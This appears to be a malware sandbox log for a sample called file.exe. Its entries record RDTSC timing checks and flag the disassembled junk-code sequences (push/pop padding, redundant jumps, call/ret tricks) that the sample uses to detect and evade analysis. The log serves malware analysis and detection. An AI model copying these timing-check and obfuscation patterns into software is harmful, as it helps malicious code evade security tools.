Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D78EB second address: 13D7903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F0F04CBD31Bh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DE9FA second address: 13DEA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1373022 second address: 1373030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1373030 second address: 137306A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E417h 0x0000001b jmp 00007F0F0527E40Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDE38 second address: 13DDE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDF97 second address: 13DDFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0F0527E40Ch 0x0000000e ja 00007F0F0527E40Eh 0x00000014 push esi 0x00000015 pop esi 0x00000016 jnc 00007F0F0527E406h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F0F0527E406h 0x00000024 jmp 00007F0F0527E40Fh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E235A second address: 13E2361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E551B second address: 13E553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Fh 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E553B second address: 13E5567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 jmp 00007F0F04CBD329h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E99DC second address: 13E99F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9B3A second address: 13E9B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0F04CBD316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9B44 second address: 13E9B78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0F0527E40Ch 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007F0F0527E416h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9B78 second address: 13E9B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Dh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9DFD second address: 13E9E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jbe 00007F0F0527E406h 0x0000000e pop esi 0x0000000f jmp 00007F0F0527E40Bh 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F0F0527E406h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9FA8 second address: 13E9FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F0F04CBD316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0F04CBD326h 0x00000011 pop esi 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007F0F04CBD316h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E9FD4 second address: 13E9FDE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0F0527E406h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA2CC second address: 13EA2D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA2D0 second address: 13EA2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA2D4 second address: 13EA322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F04CBD324h 0x0000000d pushad 0x0000000e jno 00007F0F04CBD316h 0x00000014 ja 00007F0F04CBD316h 0x0000001a jc 00007F0F04CBD316h 0x00000020 jmp 00007F0F04CBD326h 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push edx 0x0000002b pop edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA322 second address: 13EA328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA328 second address: 13EA32F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA32F second address: 13EA34C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0F0527E406h 0x0000000a jmp 00007F0F0527E413h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA4CE second address: 13EA4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EA4D2 second address: 13EA4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 je 00007F0F0527E406h 0x0000000f jmp 00007F0F0527E413h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C38 second address: 13B7C46 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C46 second address: 13B7C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C4A second address: 13B7C7A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+122D1F04h], ebx 0x00000012 lea eax, dword ptr [ebp+1248DA2Fh] 0x00000018 stc 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0F04CBD324h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B7C7A second address: 1396515 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0F0527E40Fh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0F0527E408h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 cmc 0x00000029 call dword ptr [ebp+122D1F25h] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8330 second address: 13B833A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B833A second address: 13B833F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B833F second address: 13B8365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F04CBD316h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 jp 00007F0F04CBD316h 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0F04CBD31Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B843B second address: 13B843F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B85A6 second address: 13B85C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0F04CBD320h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B85C2 second address: 13B85E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8D0C second address: 13B8D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8D12 second address: 13B8D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8F84 second address: 13B8F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8F8A second address: 13B8F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8F8E second address: 13B8FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D2A6Ah] 0x0000000f mov ecx, 02B9A001h 0x00000014 lea eax, dword ptr [ebp+1248DA2Fh] 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F0F04CBD318h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D39F8h] 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d jnc 00007F0F04CBD320h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8FDE second address: 1397042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0F0527E415h 0x0000000f nop 0x00000010 mov edi, eax 0x00000012 call dword ptr [ebp+122D1865h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0F0527E411h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EE78E second address: 13EE794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EE91D second address: 13EE921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEBDF second address: 13EEC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD329h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d js 00007F0F04CBD32Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEC08 second address: 13EEC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F0527E412h 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13EEC21 second address: 13EEC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0F04CBD316h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0F04CBD316h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4A4F second address: 13F4A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3814 second address: 13F3818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F3818 second address: 13F3845 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E419h 0x00000007 jmp 00007F0F0527E410h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F39A3 second address: 13F39E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F04CBD31Fh 0x0000000b jno 00007F0F04CBD322h 0x00000011 jmp 00007F0F04CBD31Eh 0x00000016 popad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F39E0 second address: 13F39E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F39E4 second address: 13F39FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F414D second address: 13F4158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F42E4 second address: 13F42F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F04CBD31Ch 0x00000008 jc 00007F0F04CBD316h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F42F5 second address: 13F42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4452 second address: 13F445F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F0F04CBD316h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F445F second address: 13F446E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0F0527E406h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F446E second address: 13F4477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F4477 second address: 13F447D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F447D second address: 13F448F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0F04CBD318h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13F76FF second address: 13F7703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA220 second address: 13FA22D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA22D second address: 13FA238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA38D second address: 13FA392 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FA392 second address: 13FA398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FDD36 second address: 13FDD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FDD3A second address: 13FDD4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F0527E40Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2CC second address: 13FE2D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2D4 second address: 13FE2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2DA second address: 13FE2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13FE2DE second address: 13FE30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E410h 0x00000007 jmp 00007F0F0527E411h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403D4A second address: 1403D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403D54 second address: 1403D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14025C5 second address: 14025CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14025CD second address: 14025D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402A31 second address: 1402A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402A37 second address: 1402A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402BC1 second address: 1402BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F04CBD321h 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F04CBD322h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402BF0 second address: 1402BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1402BF4 second address: 1402C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0F04CBD31Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A04 second address: 13B8A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A0A second address: 13B8A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A0E second address: 13B8A80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D38B0h] 0x0000000f mov ebx, dword ptr [ebp+1248DA6Eh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F0F0527E408h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edx, dword ptr [ebp+122D37F8h] 0x00000035 add eax, ebx 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F0F0527E408h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 sub dword ptr [ebp+122D2AA3h], ecx 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a jno 00007F0F0527E406h 0x00000060 pop eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B8A80 second address: 13B8AD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0F04CBD318h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D322Bh], ecx 0x0000002a push 00000004h 0x0000002c mov edi, dword ptr [ebp+122D3904h] 0x00000032 nop 0x00000033 jmp 00007F0F04CBD31Eh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c jmp 00007F0F04CBD31Ch 0x00000041 pop ecx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1403A4A second address: 1403A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
